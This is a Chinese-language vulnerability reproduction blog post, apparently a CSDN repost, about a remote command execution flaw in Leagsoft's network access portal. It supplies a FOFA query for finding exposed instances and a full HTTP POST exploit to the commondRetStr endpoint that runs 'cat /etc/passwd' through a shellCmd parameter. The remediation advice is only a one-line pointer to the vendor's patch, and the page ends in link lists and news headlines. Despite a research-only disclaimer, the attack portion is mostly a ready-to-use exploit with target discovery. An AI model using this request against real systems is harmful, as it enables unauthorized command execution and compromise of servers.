【漏洞复现】联软科技安全准入门户平台RCE(命令执行)漏洞

移动开发 2023-06-11 19:14:19 阅读次数: 0

文章目录

前言
声明
一、漏洞描述
二、影响平台
三、漏洞复现
四、修复方案

前言

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

声明

本篇文章仅用于漏洞复现与技术研究，请勿利用文章内的相关技术从事非法测试，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用！！！

一、漏洞描述

联软科技安全准入门户平台 commondRetStr处存在远程代码执行漏洞，攻击者可以获取服务器权限。

二、影响平台

联软准入平台

三、漏洞复现

FOFA查询语句: UniSSOView
在这里插入图片描述
EXP如下：

POST /TunnelGateway/commondRetStr HTTP/1.1
Host: 127.0.0.1
Cookie: sdp_jsessionid=3CB52344DCF9F184FA8AC82AC099F08A; sdp_verify_key=4ef5-11e41445681a7a563d4
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://127.0.0.1/UniSSO/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 24

shellCmd=cat /etc/passwd

在这里插入图片描述

四、修复方案

建议及时更新官方补丁：http://hjsoft.com.cn/

猜你喜欢

转载自blog.csdn.net/weixin_46944519/article/details/131068652

【漏洞复现】联软科技安全准入门户平台RCE(命令执行)漏洞

RCE（远程命令/代码执行漏洞）原理及复现

jumpserver 远程命令执行RCE漏洞复现和利用

【漏洞复现】Yapi接口管理平台RCE漏洞汇总

漏洞复现篇——命令执行漏洞

【漏洞复现】海康威视综合安防管理平台Fastjson远程命令执行漏洞复现

vulhub漏洞复现-gitea(1.4-rce) 目录穿越及命令执行

远程执行RCE漏洞,命令基础学习

网络安全之命令执行漏洞复现

命令执行漏洞复现攻击：识别威胁并加强安全

【漏洞复现】金蝶云星空管理中心反序列化命令执行漏洞(RCE)

Joomla 3.0.0 -3.4.6远程代码执行(RCE)漏洞复现

fastjson的RCE漏洞复现记录

Webmin<=1.920 RCE 漏洞复现

Solr-rce漏洞复现

[漏洞复现] Apache Solr RCE

漏洞复现篇——任意代码命令执行漏洞复现及防御

【网路安全---漏洞复现】Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell（CVE-2017-18349）

Drupal Drupalgeddon 2远程执行代码漏洞RCE（CVE-2018-7600）漏洞复现

【漏洞复现】RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)

【漏洞复现】2023HVV WPS Office 远程代码执行漏洞(RCE)

ThinkPHP 远程命令执行漏洞复现(GetShell)

ThinkPHP远程命令执行漏洞原理及复现

漏洞复现——Apache SSI远程命令执行

漏洞复现之通达OA命令执行

通达OA命令执行漏洞复现

Webmin 远程命令执行漏洞复现

XAMPP任意命令执行漏洞复现

PHPMailer远程命令执行漏洞复现

Apache shiro 远程命令执行漏洞复现

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

NEFU 117 素数个数的位数

Closest Common Ancestors (Lca,tarjan)

ELK部署

【转载】Hive笔记整理（三）

SQL语句（一）基本表的定义

关于Java web开发中的MySQL的事务语句

MFC创建自定义窗体

如何用一句话激怒程序员？

《逆袭大学》文摘——9.4 基础和应用的平衡中找到大学的节奏

【spring源码分析】@Value注解原理

每日归档

更多

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)